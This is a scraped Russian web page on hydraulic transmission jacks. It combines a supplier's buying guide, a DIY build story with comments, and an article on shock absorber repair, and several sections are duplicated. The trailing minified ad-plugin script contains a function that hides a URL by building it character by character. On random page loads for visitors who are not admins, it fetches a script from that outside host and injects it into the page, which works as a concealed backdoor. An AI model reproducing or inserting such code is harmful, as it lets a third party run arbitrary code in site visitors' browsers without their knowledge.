117 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Гидравлическая стойка своими руками

Гидравлическая стойка своими руками

Что это за механизм и как выбрать качественную стойку.

Трансмиссионная гидравлическая стойка – это стационарное или мобильное приспособление для производства следующих работ в автосервисе:

· Поддержка таких агрегатов как КПП, карданных валов, тормозных суппортов и пр. в процессе ремонта автомобиля на СТО.

· Фиксация частично или полностью демонтированного узла на время проведения работ.

По сути стойка – это бутылочный гидравлический домкрат, только большой и на колёсах.

Основные типы гидравлических трансмиссионных стоек:

· Стандартная гаражная одноступенчатая трансмиссионная стойка, г/п 0,3-0,6т. в основном используется при проведении слесарных работ в автосервисе.

Стандартно укомплектованы подхватом типа «рога». Стойка с «рогами» используется в основном в качестве поддерживающего устройства.

И трансмиссионные стойки с поворотной площадкой и цепями. Такие стойки применяются для фиксации или демонтажа узлов и агрегатов трансмиссии на время проведения работ.

· Двухступенчатые трансмиссионные стойки, рекомендуется к применению на агрегатном участке автосервиса.

Этот тип стоек обычно характеризуется увеличенной до 1,5 т. грузоподъемностью.

И особо рекомендуются для грузовых СТО и агрегатных участков автосервиса. Гидравлический механизм таких моделей позволяет опускать детали трансмиссии на минимальное расстояние от пола.

· Трансмиссионный домкрат (стойка).

Этот тип вспомогательных механизмов внешне напоминает подкатной домкрат, но с увеличенной до 1м. высотой подъёма и наличием фиксирующей агрегаты поворотной площадкой с цепями.

Эти домкраты очень удобны и часто используются в грузовых автосервисах, потому что детали грузовых автомобилей и спецтехники тяжелые.

И лучше перевозить агрегат на высоте 20см от пола, чем 1,5м.

Если агрегат упадёт, то последствия падения будут ОЧЕНЬ значительные.

Теперь основное – как выбрать качественную трансмиссионную стойку?

На что обратить внимание при покупке:

1. Пожалуй самое важное – диаметр штока стойки. У качественной стойки диаметр штока — 32мм.

2. Вес стойки. Здесь всё просто — чем больше вес, тем больше металла, тем качественнее стойка.

3. Чистота обработки (шероховатость) штока стойки. Можно проверить просто и без приборов. Проведите ногтём вдоль штока. Если шток качественно выточен, то шероховатость будет минимальной.

4. Проверьте гидравлический механизм стойки. Его тоже просто проверить. Поднимите стойку с площадкой в крайнее верхнее положение и поверните ручку для опускания механизма.

Если стойка опускается под собственным весом, то стойка кондиционная, а вот если надо дополнительно прикладывать нагрузку для опускания стойки, то эта стойка не очень качественная.

5. Нажимая на педаль подъёма, проследите чтобы педаль двигалась без рывков (плавно). Если педаль двигается с рывками, такую стойку лучше не покупать.

6. Страна производитель. С вероятностью 99% все стойки, которые продаются в России произведены в Китае. Учтите это при совершении покупки.

Цена трансмиссионной стойки.

ООО «Техносоюз» импортирует трансмиссионные стойки непосредственно от производителя. Без посредников, дилеров и т.п., поэтому цена стойки для Вас не большая.

Какое масло залить.

Рекомендуемые масла по ГОСТ 17479.3-85 при установке в отапливаемом помещении:
лето – гидравлическое с кинематической вязкостью 46 (41,4-50,6) – производства Газпром/ТНК/Лукойл.

Рекомендуемые масла по ГОСТ 17479.3-85 при установке на улице или в не отапливаемом помещении:
летом – гидравлическое с кинематической вязкостью 46 (41,4-50,6) – производства Газпром/ТНК/Лукойл.
зимнее время – гидравлическое с кинематической вязкостью 32 (28.8-35.2) – производства Газпром/ТНК/Лукойл.

У нас вы сможете купить трансмиссионную стойку на выгодных условиях, поскольку мы работаем непосредственно с производителями.

Если таких масел нет в наличии или нет возможности их купить, возможна заливка индустриального (веретённого) масла марки И-40А.

Используйте возможность купить надежную трансмиссионную стойку по оптимальной цене у ответственного поставщика оборудования.

Давно хотел сделать стойку для снятия КПП. Так как приходится время от времени снимать КПП и Раздатку. И для смены сцепления. Все работы делаются как правило в смотровой яме. И без посторонней помощи снять эти агрегаты очень трудно . За основу взял фабричную стойку из нета. НО вот встала проблема как максимально опустить КПП для того чтобы её можно было вытаскивать из ямы.Основной домкрат опускается на 16 см. А делать сквозные отверстия в трубах не логично.Хотелось чтобы всё поднималось без усилия. Всё было сделано за два вечера после работы. Идею подсказал сосед по гаражу Дядя Саша. Просто я уже стал забывать что когда то в ходу были такие Жигулёвские домкраты. Лучше брать от Волги. У него вылет длиннее.Сейчас всё ромбы да гидравлика. Вот к чему я пришёл и сделал. Я буду рад если моя задумка кому то пригодится.Удачи всем. Омск 2015г. Продолжение о уже работе стойки смотрите тут. brreporter.com/v/video-ZNAxQI16sos.html

Алексей Савельев 3 anos atrás

Вопрос. Наверху трубы, есть точки сварки. Для чего? и как ты добился, чтобы внутренняя трубя не болталась в наружной?

Uwcerputz 3 anos atrás

+Алексей Савельев да ты прав что спросил про эти точки сварки. Чтобы труба в трубе не болталась я сделал три отверстия . И вставил туда кусочки электродов. Тем самым выбрал зазор между трубами. И заварил их. Всё просто.

Гидравлические трансмиссионные стойки предназначены для выполнения различных работ, связанных с монтажом и демонтажем коробок передач, ремонтом, заменой и обслуживанием выхлопной системы, работами, связанными с ремонтом двигателей, с другими элементами системы трансмиссии.

Гидравлические стойки для снятия КПП еще называют другим термином: гидравлические домкраты. И это, по сути, правильно. Все трансмиссионные стойки работают по принципу гидравлического домкрата. И приводом стоек является гидравлическая система подъема и опускания.

Создание усилия в гидравлической стойке достигается за счет перепадов сечения в главном гидравлическом цилиндре и плунжере. Собственно, по этому принципу работают все гидравлические домкраты. В качестве рабочей жидкости используется масло для домкратов.

Устройство гидравлической трансмиссионной стойки

Приводом в стойке служит гидравлический домкрат. Для создания давления внутри цилиндра домкрата используется рукоять или педаль. В случае с педальным запуском домкрата, у человека, работающего с автомобилем, остаются свободные руки, что является определенным преимуществом.

Хотя по большому счету, совершенно не важно, рукой или ногой создается давление внутри гидравлического цилиндра. Ручка домкрата, как и педаль, после того, как была выполнена операция по подъему, может складываться, прижимаясь к корпусу гидравлического цилиндра.

Домкрат может быть одноступенчатым или двухступенчатым (телескопическим). Двухступенчатые трансмиссионные стойки имею больший рабочий ход. При этом у них меньшая нагрузка возникает на изгиб. Это происходит из-за того, что существует два штока.

Гидравлическая трансмиссионная стойка опирается на площадку, у которой есть четыре горизонтальных опоры. На концах опор находятся колеса, при помощи которых стойка передвигается. Однако существуют модели, в которых колеса на опорах отсутствуют. Колеса могут быть закреплены неподвижно и иметь шарнирное (поворотное) соединение с лапами опор. Поворотное крепление колес делает трансмиссионную стойку более мобильной.

Помимо основных опор, которые обязательны в любой трансмиссионной стойке, могут быть гидравлические стойки для снятия КПП, в конструкции которых предусмотрены четыре дополнительных опоры. Они упираются в края лап нижней опоры и под углом поддерживают стойку в верхней части конструкции. Такая компоновка используется в трансмиссионных домкратах с длинной стойкой и длинным штоком.

Рабочий шток может иметь разную длину и выполняется из легированной стали. В верхней части рабочего штока имеется основание, на которое крепится технологическая площадка суппорт. Суппорт может быть специализированным, подходящим для выполнения каких-то определенных работ. В некоторых моделях стоек применяется универсальный суппорт.

Суппорт может иметь фиксированное положение и может иметь поворотную систему в разных плоскостях. На площадке может быть предусмотрено различное крепление для узлов автомобиля, с которыми предстоит работать. Поворотные универсальные площадки дают большие возможности всей трансмиссионной стойке.

Для сброса давления гидравлические трансмиссионные стойки оснащаются специальным вентилем. Все стойки такого типа имеют специальный предохранительный клапан, срабатывающий, если вес поднимаемого блока или агрегата оказывается больше максимально возможного для данного трансмиссионного гидравлического домкрата.

Особенности применения гидравлических трансмиссионных стоек

Важными характеристиками этих подъемных систем является грузоподъемность, которая редко превышает 2 тонны. Это связано с тем, что этой грузоподъемности хватает, чтобы справиться с любым по весу агрегатом в автомобиле.

Следующая характеристика – рабочий ход штока. Для грузовых автомобилей чаще всего применяются гидравлические стойки для снятия КПП с телескопическим рабочим штоком. У таких конструкций долее длинный рабочий ход штока, чем у стоек с одинарным штоком.

Еще одна важная характеристика – минимальная высота при полностью задвинутом штоке. Меньшая высота конструкции дает возможность свободно подкатить стойку под автомобиль, не используя для этого смотровую яму.

Трансмиссионные гидравлические стойки для снятия КПП

Гидравлические трансмиссионные стойки предназначены для выполнения различных работ, связанных с монтажом и демонтажем коробок передач, ремонтом, заменой и обслуживанием выхлопной системы, работами, связанными с ремонтом двигателей, с другими элементами системы трансмиссии.

Гидравлические стойки для снятия КПП еще называют другим термином: гидравлические домкраты. И это, по сути, правильно. Все трансмиссионные стойки работают по принципу гидравлического домкрата. И приводом стоек является гидравлическая система подъема и опускания.

Создание усилия в гидравлической стойке достигается за счет перепадов сечения в главном гидравлическом цилиндре и плунжере. Собственно, по этому принципу работают все гидравлические домкраты. В качестве рабочей жидкости используется масло для домкратов.

Устройство гидравлической трансмиссионной стойки

Приводом в стойке служит гидравлический домкрат. Для создания давления внутри цилиндра домкрата используется рукоять или педаль. В случае с педальным запуском домкрата, у человека, работающего с автомобилем, остаются свободные руки, что является определенным преимуществом.

Хотя по большому счету, совершенно не важно, рукой или ногой создается давление внутри гидравлического цилиндра. Ручка домкрата, как и педаль, после того, как была выполнена операция по подъему, может складываться, прижимаясь к корпусу гидравлического цилиндра.

Домкрат может быть одноступенчатым или двухступенчатым (телескопическим). Двухступенчатые трансмиссионные стойки имею больший рабочий ход. При этом у них меньшая нагрузка возникает на изгиб. Это происходит из-за того, что существует два штока.

Гидравлическая трансмиссионная стойка опирается на площадку, у которой есть четыре горизонтальных опоры. На концах опор находятся колеса, при помощи которых стойка передвигается. Однако существуют модели, в которых колеса на опорах отсутствуют. Колеса могут быть закреплены неподвижно и иметь шарнирное (поворотное) соединение с лапами опор. Поворотное крепление колес делает трансмиссионную стойку более мобильной.

Помимо основных опор, которые обязательны в любой трансмиссионной стойке, могут быть гидравлические стойки для снятия КПП, в конструкции которых предусмотрены четыре дополнительных опоры. Они упираются в края лап нижней опоры и под углом поддерживают стойку в верхней части конструкции. Такая компоновка используется в трансмиссионных домкратах с длинной стойкой и длинным штоком.

Рабочий шток может иметь разную длину и выполняется из легированной стали. В верхней части рабочего штока имеется основание, на которое крепится технологическая площадка суппорт. Суппорт может быть специализированным, подходящим для выполнения каких-то определенных работ. В некоторых моделях стоек применяется универсальный суппорт.

Суппорт может иметь фиксированное положение и может иметь поворотную систему в разных плоскостях. На площадке может быть предусмотрено различное крепление для узлов автомобиля, с которыми предстоит работать. Поворотные универсальные площадки дают большие возможности всей трансмиссионной стойке.

Для сброса давления гидравлические трансмиссионные стойки оснащаются специальным вентилем. Все стойки такого типа имеют специальный предохранительный клапан, срабатывающий, если вес поднимаемого блока или агрегата оказывается больше максимально возможного для данного трансмиссионного гидравлического домкрата.

Особенности применения гидравлических трансмиссионных стоек

Важными характеристиками этих подъемных систем является грузоподъемность, которая редко превышает 2 тонны. Это связано с тем, что этой грузоподъемности хватает, чтобы справиться с любым по весу агрегатом в автомобиле.

Следующая характеристика – рабочий ход штока. Для грузовых автомобилей чаще всего применяются гидравлические стойки для снятия КПП с телескопическим рабочим штоком. У таких конструкций долее длинный рабочий ход штока, чем у стоек с одинарным штоком.

Еще одна важная характеристика – минимальная высота при полностью задвинутом штоке. Меньшая высота конструкции дает возможность свободно подкатить стойку под автомобиль, не используя для этого смотровую яму.

Ремонт и восстановление стоек амортизаторов своими рукам – возможно ли это?

Амортизаторы являются своего рода расходным материалом вашего автомобиля. Причём расходы на поддержание подвески в рабочем состоянии обратно пропорциональны качеству дорог. Автовладельцы постоянно ищут способы, как сэкономить на ремонте и обслуживании своей машины. Мы расскажем о самостоятельном ремонте и восстановлении характеристик стоек амортизатора.

Когда передние и задние стойки амортизатора нуждаются в проверке

Типичные неисправности этого узла известны всем:

  • Разгерметизация сальника штока. Приводит к утечке масла из стойки. Может потечь в любой момент. Характеристики меняются вплоть до полной потери работоспособности.
  • Слишком свободное перемещение штока в трубе. Фактически стойка из амортизатора превращается в направляющую для пружины подвески. Неисправность связана с внутренними клапанами.
  • Люфт при сжатии или отбое. Связан с выработкой в штоке или цилиндре. Последствия аналогичны сломанным клапанам. Амортизатор не выполняет своей функции в авто, стучит, гремит и издаёт другие неприятные звуки, почему ехать в таком авто становится некомфортно и опасно.
  • Внешние повреждения — вмятины на корпусе, трещины в проушине. Влияют на ходовую в целом и могут привести к более серьёзной поломке.

При выявлении любой неисправности необходимо снять стойку и освободить её от пружины. Демонтаж производится в гараже, без использования специального инструмента.

Иногда владельцы иномарок, замечая, что их стойки дали течь, обращаются за диагностикой в СТО, где проволят проверку на стенде.

Ремонт или замена? Что можно сделать своими руками

На самом деле это не такая простая задача. Перед проведением работ следует внимательно изучить материал и соблюдать технику безопасности. Прежде всего надо определить, разборный у вас амортизатор или нет. Монолитный корпус неремонтопригоден, вскрытие болгаркой и заваривание недопустимо.

Если в месте захода штока в трубу стоит гайка или стопорное кольцо, такую амортизаторную стойку можно обслуживать и ремонтировать.

Так выглядит ремонтопригодная стойка

Необходимые инструменты

  • Компрессор для подачи сжатого воздуха или насос для обслуживания велосипедных амортизаторов.
  • Специальный штуцер для нагнетания сжатого воздуха.

Внимание! Необходимо позаботиться о безопасности. Работа связана с высоким давлением, поэтому необходима защита глаз и рук.

Восстановление давления газа в стойке

  1. Амортизатор прочно закрепляется в тисках, положение вертикальное. Необходимо тщательно очистить деталь и продуть место захода штока сжатым воздухом. Производится его разборка — снятие защитного колпачка штока.

Для удобства работа проводится в тисках

Для контроля используйте манометр. Способ пригоден для газовых и газомасляных стоек

Процесс можно посмотреть на видео.

Видео о том, как делать подкачку газа в газомасляной стойке

Существуют различные мнения: чем заправлять автомобильный амортизатор. Азотом, углекислотой или просто сжатым воздухом? В условиях гаража вариантов немного. Сжатый воздух не сильно ухудшит характеристики, особенно с учётом того, что это ремонт, а не изготовление стойки на заводе.

Прокачка амортизатора

  1. Стойку надо полностью разобрать и очистить от грязи и старого масла. Проверить уплотнительные кольца и состояние внутренней стенки трубы.

Устраните потёки и прочие загрязнения со всех механизмов стойки

Чтобы работать с масляными стойками, никакого специального оборудования не требуется

Видео: как восстановить работоспособность неразборного механизма и есть ли смысл

Замена штока, клапанов, настройка жёсткости амортизаторов

Следующая неисправность — повреждение штока, сальников, клапанов внутри стойки. На рынке существует некоторый выбор запасных частей для ремонта разборных амортизаторов. К тому же опытный автолюбитель никогда не выбрасывает старые запасные части, а стараются их отремонтировать. Вдобавок из них всегда можно извлечь работоспособные детали.

    Итак, разбираем амортизатор.

Не забудьте надеть перчатки, работа пыльная

Токарные работы обычно дешевле стоимости нового амортизатора

Совет: Весь процесс разборки амортизатора следует фотографировать. Это позволит избежать проблем при сборке.

Важно обеспечить чистоту узла, попадание грязи или твёрдых частиц металла быстро выведет из строя восстановленный амортизатор.

Избавьтесь от потёков, грязи и пыли ещё в процессе разбора

Все детали должны быть тщательно отдефектованы

Сальник рекомендуется к замене

После закачки масла стойку нужно прокачать, как и обычно

Видео: Как отремонтировать автомобильные амортизационные стойки Макферсон

При наличии элементарной информации о принципах работы ваших амортизаторов можно сэкономить на их замене. Большинство моделей стоек ремонтопригодны, а комплектующие либо приобретаются по разумным ценам, либо изготавливаются самостоятельно.

Стойки гидравлические трансмиссионные

Что это за механизм и как выбрать качественную стойку.

Трансмиссионная гидравлическая стойка – это стационарное или мобильное приспособление для производства следующих работ в автосервисе:

· Поддержка таких агрегатов как КПП, карданных валов, тормозных суппортов и пр. в процессе ремонта автомобиля на СТО.

· Фиксация частично или полностью демонтированного узла на время проведения работ.

По сути стойка – это бутылочный гидравлический домкрат, только большой и на колёсах.

Основные типы гидравлических трансмиссионных стоек:

· Стандартная гаражная одноступенчатая трансмиссионная стойка, г/п 0,3-0,6т. в основном используется при проведении слесарных работ в автосервисе.

Стандартно укомплектованы подхватом типа «рога». Стойка с «рогами» используется в основном в качестве поддерживающего устройства.

И трансмиссионные стойки с поворотной площадкой и цепями. Такие стойки применяются для фиксации или демонтажа узлов и агрегатов трансмиссии на время проведения работ.

· Двухступенчатые трансмиссионные стойки, рекомендуется к применению на агрегатном участке автосервиса.

Этот тип стоек обычно характеризуется увеличенной до 1,5 т. грузоподъемностью.

И особо рекомендуются для грузовых СТО и агрегатных участков автосервиса. Гидравлический механизм таких моделей позволяет опускать детали трансмиссии на минимальное расстояние от пола.

· Трансмиссионный домкрат (стойка).

Этот тип вспомогательных механизмов внешне напоминает подкатной домкрат, но с увеличенной до 1м. высотой подъёма и наличием фиксирующей агрегаты поворотной площадкой с цепями.

Эти домкраты очень удобны и часто используются в грузовых автосервисах, потому что детали грузовых автомобилей и спецтехники тяжелые.

И лучше перевозить агрегат на высоте 20см от пола, чем 1,5м.

Если агрегат упадёт, то последствия падения будут ОЧЕНЬ значительные.

Теперь основное – как выбрать качественную трансмиссионную стойку?

На что обратить внимание при покупке:

1. Пожалуй самое важное – диаметр штока стойки. У качественной стойки диаметр штока — 32мм.

2. Вес стойки. Здесь всё просто — чем больше вес, тем больше металла, тем качественнее стойка.

3. Чистота обработки (шероховатость) штока стойки. Можно проверить просто и без приборов. Проведите ногтём вдоль штока. Если шток качественно выточен, то шероховатость будет минимальной.

4. Проверьте гидравлический механизм стойки. Его тоже просто проверить. Поднимите стойку с площадкой в крайнее верхнее положение и поверните ручку для опускания механизма.

Если стойка опускается под собственным весом, то стойка кондиционная, а вот если надо дополнительно прикладывать нагрузку для опускания стойки, то эта стойка не очень качественная.

5. Нажимая на педаль подъёма, проследите чтобы педаль двигалась без рывков (плавно). Если педаль двигается с рывками, такую стойку лучше не покупать.

6. Страна производитель. С вероятностью 99% все стойки, которые продаются в России произведены в Китае. Учтите это при совершении покупки.

Цена трансмиссионной стойки.

ООО «Техносоюз» импортирует трансмиссионные стойки непосредственно от производителя. Без посредников, дилеров и т.п., поэтому цена стойки для Вас не большая.

Какое масло залить.

Рекомендуемые масла по ГОСТ 17479.3-85 при установке в отапливаемом помещении:
лето – гидравлическое с кинематической вязкостью 46 (41,4-50,6) – производства Газпром/ТНК/Лукойл.

Рекомендуемые масла по ГОСТ 17479.3-85 при установке на улице или в не отапливаемом помещении:
летом – гидравлическое с кинематической вязкостью 46 (41,4-50,6) – производства Газпром/ТНК/Лукойл.
зимнее время – гидравлическое с кинематической вязкостью 32 (28.8-35.2) – производства Газпром/ТНК/Лукойл.

У нас вы сможете купить трансмиссионную стойку на выгодных условиях, поскольку мы работаем непосредственно с производителями.

Если таких масел нет в наличии или нет возможности их купить, возможна заливка индустриального (веретённого) масла марки И-40А.

Используйте возможность купить надежную трансмиссионную стойку по оптимальной цене у ответственного поставщика оборудования.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика